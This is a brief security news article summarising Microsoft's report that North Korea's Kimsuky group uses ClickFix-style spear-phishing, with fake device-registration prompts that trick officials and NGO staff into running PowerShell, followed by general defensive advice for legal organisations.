North Korean Hacker Group Uses ClickFix Tactics in Targeted Espionage

North Korean state-backed hacker group Kimsuky (also known as Emerald Sleet or Velvet Chollima) has adopted a new cyberattack method inspired by the widely used ClickFix tactics.

Bill Toulas, reporting in BleepingComputer, explains that ClickFix is a social engineering method that manipulates victims into executing malicious code, often through PowerShell commands, leading to malware infections.

According to Microsoft’s Threat Intelligence team, this tactic marks a shift in Kimsuky’s approach to compromising espionage targets.

ClickFix tactics have become popular among cybercriminals for distributing infostealer malware. The attack involves fake error messages or system prompts that convince victims to run malicious PowerShell commands to fix technical issues.

Kimsuky’s version of this tactic builds on this method by impersonating South Korean government officials to establish trust with victims. Once trust is established, the attacker sends a spear-phishing email containing a PDF attachment.

When the target tries to open the document, they are redirected to a fake device registration link instructing them to run PowerShell as an administrator and paste attacker-provided code. This allows the installation of a remote desktop tool, registration of the victim’s device with a remote server, and direct data exfiltration.

Microsoft has observed Kimsuky’s use of this tactic in limited attacks since January 2025, targeting individuals working in international affairs organizations, NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia.

Microsoft has notified affected customers and warned others to remain cautious about unsolicited communications. The use of ClickFix tactics by a nation-state actor highlights the growing effectiveness of this tactic in espionage operations.

Law departments and firms handling sensitive information, particularly in government or international affairs, should be aware of evolving social engineering tactics like ClickFix.

Staff should receive training on recognizing spear-phishing attempts and the dangers of executing code from unsolicited messages. Implementing multi-factor authentication, endpoint monitoring, and regular security audits can help mitigate the risk of such attacks.